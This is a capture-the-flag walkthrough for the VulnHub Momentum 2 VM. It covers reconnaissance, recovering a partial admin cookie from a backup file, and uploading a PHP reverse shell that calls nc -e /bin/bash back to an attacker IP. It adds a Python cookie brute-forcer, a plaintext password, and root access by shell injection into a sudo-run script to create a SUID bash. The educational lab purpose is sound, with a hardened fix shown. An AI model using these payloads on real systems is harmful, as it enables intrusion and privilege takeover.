This is a VulnHub boot2root VM for practising penetration testing and exploitation. It is rated medium difficulty, and the skills it is meant to exercise are PHP source-code review and privilege escalation. The walkthrough follows.
Information gathering
Scan the subnet: netdiscover -i eth0 -r 192.168.0.0/24
Target host found: 192.168.0.111
Port-scan the target: nmap 192.168.0.111
Ports 22 and 80 are open
Enumerate web directories: gobuster dir -u http://192.168.0.111/ -x html,txt,php,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
A few interesting files turn up:
- /ajax.php.bak
- /ajax.php
- /dashboard.html
Finding the web vulnerability
/dashboard.html is a file-upload page; the upload logic lives in main.js:
function uploadFile(){
...omit...
// Set POST method and ajax file path
xhttp.open("POST","ajax.php",true);
...omit...
The code POSTs to ajax.php, and the backup ajax.php.bak reads:
//The boss told me to add one more Upper Case letter at the end of the cookie
if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){
    //[+] Add if $_POST['secure'] == 'val1d'
    $valid_ext = array("pdf","php","txt");
}
else{
    $valid_ext = array("txt");
}
// Remember success upload returns 1
From this we learn:
- admin can upload .php files; everyone else is limited to .txt
- the admin cookie in the backup is incomplete: one trailing upper-case letter was added in the live version, so there are at most 26 candidates; trying them all shows the letter is R
- the upload must carry a secure parameter whose value is val1d (with the digit 1, exactly as in the comment in ajax.php.bak)
- a successful upload returns 1
Putting this together, the upload request becomes:
POST /ajax.php HTTP/1.1
Host: 192.168.0.111
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------136110921536555815714284481441
Content-Length: 5842
Origin: http://192.168.0.111
Connection: close
Cookie: admin=&G6u@B6uDXMq&MsR
Referer: http://192.168.0.111/dashboard.html

-----------------------------136110921536555815714284481441
Content-Disposition: form-data; name="secure"

val1d
-----------------------------136110921536555815714284481441
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-php

<?php shell_exec('nc 192.168.0.100 1234 -e /bin/bash'); ?>
-----------------------------136110921536555815714284481441--
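The brute force of the missing cookie letter and the multipart upload, as an added example that is not part of the original walkthrough. It is standard-library Python: `local_oracle` is a constructed stand-in that re-implements the whitelist logic of ajax.php.bak (plus the secure check its comment describes) so the search can be exercised offline, and `http_oracle` is the same search pointed at a real ajax.php URL. The URL, the probe file name and the function names are my assumptions; the field names and the partial cookie come from the request above. Against a live target every attempt uploads one small probe file, so expect up to 26 of them in the upload directory.

```python
import string
import urllib.request
import uuid

# Partial admin cookie from ajax.php.bak; the comment says one more
# upper-case letter was appended in the live version.
PARTIAL_COOKIE = "&G6u@B6uDXMq&Ms"
SECURE_VALUE = "val1d"   # required POST field, also from the .bak comment


def candidate_cookies(partial=PARTIAL_COOKIE):
    """The 26 possible live cookies: partial value + one upper-case letter."""
    return [partial + letter for letter in string.ascii_uppercase]


def build_multipart(fields, filename, content, content_type="application/x-php"):
    """Build a multipart/form-data body by hand, in the shape of the
    captured request (text field(s) first, then the file part)."""
    boundary = "----PyBoundary" + uuid.uuid4().hex
    lines = []
    for name, value in fields.items():
        lines += ["--" + boundary,
                  'Content-Disposition: form-data; name="%s"' % name,
                  "", value]
    lines += ["--" + boundary,
              'Content-Disposition: form-data; name="file"; filename="%s"' % filename,
              "Content-Type: " + content_type,
              "", content,
              "--" + boundary + "--", ""]
    body = "\r\n".join(lines).encode()
    return "multipart/form-data; boundary=" + boundary, body


def local_oracle(secret_cookie):
    """Constructed stand-in for ajax.php so the search runs offline.
    Mirrors the .bak logic: the full cookie plus secure=val1d unlocks
    pdf/php/txt, anything else only txt. Returns '1' on success like
    the real endpoint, '0' otherwise (assumed failure value)."""
    def upload(cookie, secure, filename):
        ext = filename.rsplit(".", 1)[-1].lower()
        if cookie == secret_cookie and secure == SECURE_VALUE:
            valid_ext = ("pdf", "php", "txt")
        else:
            valid_ext = ("txt",)
        return "1" if ext in valid_ext else "0"
    return upload


def http_oracle(url):
    """Real oracle: POST one probe upload to ajax.php and return the body."""
    def upload(cookie, secure, filename):
        ctype, body = build_multipart({"secure": secure}, filename,
                                      "<?php echo 'probe'; ?>")
        req = urllib.request.Request(url, data=body, method="POST")
        req.add_header("Content-Type", ctype)
        req.add_header("Cookie", "admin=" + cookie)
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode().strip()
    return upload


def find_admin_cookie(upload, probe_name="probe.php"):
    """A .php upload only returns '1' with the right cookie, so the
    upload endpoint itself is the oracle for the missing letter."""
    for cookie in candidate_cookies():
        if upload(cookie, SECURE_VALUE, probe_name) == "1":
            return cookie
    return None


if __name__ == "__main__":
    # Offline run against the constructed oracle seeded with the real cookie.
    print(find_admin_cookie(local_oracle("&G6u@B6uDXMq&MsR")))
```

Against the VM, `find_admin_cookie(http_oracle("http://192.168.0.111/ajax.php"))` performs at most 26 uploads and returns the working cookie, after which the request shown above can be sent with the real shell.php.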
Start a listener on port 1234 on the attacking host before uploading shell.php; once the upload succeeds the reverse shell connects back. The -e flag is traditional netcat's "execute this program after connecting"; if the target ships the OpenBSD build of netcat, which has no -e, use a PHP reverse shell instead.
192.168.0.100 # nc -lvp 1234
listening on [any] 1234
connect to [192.168.0.100] from...omit...[192.168.0.111]
whoami
www-data
Privilege escalation to athena
After upgrading to an interactive shell, look for the target files; they are in athena's home directory:
www-data@momentum2:/home/athena$ ls
password-reminder.txt user.txt
www-data@momentum2:/home/athena$ cat user.txt
...omit...
FLAG:
....omit...
password-reminder.txt contains a password, and testing confirms it is athena's (the [Asterisk] in the file stands for a literal *):
www-data@momentum2:/home/athena$ cat password-reminder.txt
password : myvulnerableapp[Asterisk]
www-data@momentum2:/home/athena$ su athena
su athena
Password: myvulnerableapp*
athena@momentum2:~$
Privilege escalation to root
athena@192.168.1.240:~$ sudo -l
sudo -l
Matching Defaults entries for athena on momentum2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User athena may run the following commands on momentum2:
(root) NOPASSWD: /usr/bin/python3 /home/team-tasks/cookie-gen.py
cookie-gen.py reads:
import random
import os
import subprocess

print('~ Random Cookie Generation ~')
print('[!] for security reasons we keep logs about cookie seeds.')
chars = '@#$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh'
seed = input("Enter the seed : ")
random.seed = seed
cookie = ''
for c in range(20):
    cookie += random.choice(chars)
print(cookie)
cmd = "echo %s >> log.txt" % seed
subprocess.Popen(cmd, shell=True)
The seed is interpolated straight into a shell command string and run with shell=True, so anything after a ; in the seed is executed by the shell, as root under the sudo rule above. Entering 2;bash -i works in testing, but the resulting shell is awkward to use.
A cleaner approach is to copy bash to /tmp and set the SUID bit on the copy, then run it with -p so bash keeps the root effective uid instead of dropping it. In the session below, the lone "2" printed after the cookie is the output of the echo 2 that runs before the ; in the injected seed.
athena@momentum2:~$ cd /home/team-tasks
athena@momentum2:/home/team-tasks$ sudo python3 cookie-gen.py
~ Random Cookie Generation ~
[!] for security reasons we keep logs about cookie seeds.
Enter the seed : 2;cp /bin/bash /tmp/bash; chmod u+s /tmp/bash
SLhHfZUPTWW$WUGLDDWO
2
athena@momentum2:/home/team-tasks$ /tmp/bash -p
bash-5.0# whoami
root
bash-5.0# cd /root
bash-5.0# ls
root.txt
bash-5.0# cat root.txt
...omit...
FLAG:
...omit...
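The command injection in cookie-gen.py, as an added example that is not from the original page: the vulnerable logging line is reproduced beside a hardened version, and both are run on a constructed, harmless seed inside a temporary directory so nothing touches the real log.txt. The payload 2; echo INJECTED has the same shape as the walkthrough's 2;cp /bin/bash /tmp/bash; chmod u+s /tmp/bash. The function names and the temp-directory setup are mine; hardened_cookie also addresses the script's random.seed = seed line, which replaces the seed function rather than calling it, so the cookie was never seeded at all.

```python
import os
import secrets
import subprocess
import tempfile

CHARS = '@#$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh'


def vulnerable_log(seed, workdir):
    """Mirror of the logging line in cookie-gen.py. The seed is pasted into
    a command string and handed to /bin/sh via shell=True, so a ';' ends
    the echo and whatever follows runs with the script's privileges
    (root when invoked through the sudo rule). Returns (command, stdout)."""
    cmd = "echo %s >> log.txt" % seed
    proc = subprocess.run(cmd, shell=True, cwd=workdir,
                          capture_output=True, text=True)
    return cmd, proc.stdout


def hardened_log(seed, workdir):
    """Hardened version: no shell at all. The seed is written as data with
    a plain file append, so shell metacharacters are inert."""
    with open(os.path.join(workdir, "log.txt"), "a", encoding="utf-8") as fh:
        fh.write(seed + "\n")
    return "(no command; plain file write)", ""


def hardened_cookie(length=20):
    """Replacement for the cookie loop: a secret token should come from
    the secrets module, not from an (accidentally unseeded) random."""
    return "".join(secrets.choice(CHARS) for _ in range(length))


def read_log(workdir):
    """Return the content of log.txt in workdir, or '' if it was not created."""
    path = os.path.join(workdir, "log.txt")
    if not os.path.exists(path):
        return ""
    with open(path, encoding="utf-8") as fh:
        return fh.read()


def demo(seed, logger):
    """Run one logger on a fresh temp dir; returns (cmd, stdout, log content)."""
    with tempfile.TemporaryDirectory() as workdir:
        cmd, out = logger(seed, workdir)
        return cmd, out, read_log(workdir)


if __name__ == "__main__":
    # Constructed payload: same shape as the walkthrough's seed, but harmless.
    payload = "2; echo INJECTED"
    for logger in (vulnerable_log, hardened_log):
        cmd, out, log = demo(payload, logger)
        print(logger.__name__, "| cmd:", cmd,
              "| stdout:", repr(out), "| log.txt:", repr(log))
```

With the vulnerable logger the shell runs echo 2 (which is why a bare 2 appears on stdout, exactly as in the session above) and then echo INJECTED >> log.txt; with the hardened logger the whole string lands in log.txt as text and nothing executes.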
References
https://infosecwriteups.com/vulnhub-momentum-2-walkthrough-8addad2e6a8f
https://www.dotnetrussell.com/index.php/2021/07/16/vulnhub-momentum2-vm-walkthrough
https://blog.gibbons.digital/hacking/2021/07/11/momentum.html
https://nepcodex.com/2021/06/momentum-2-walkthrough-vulnhub-writeup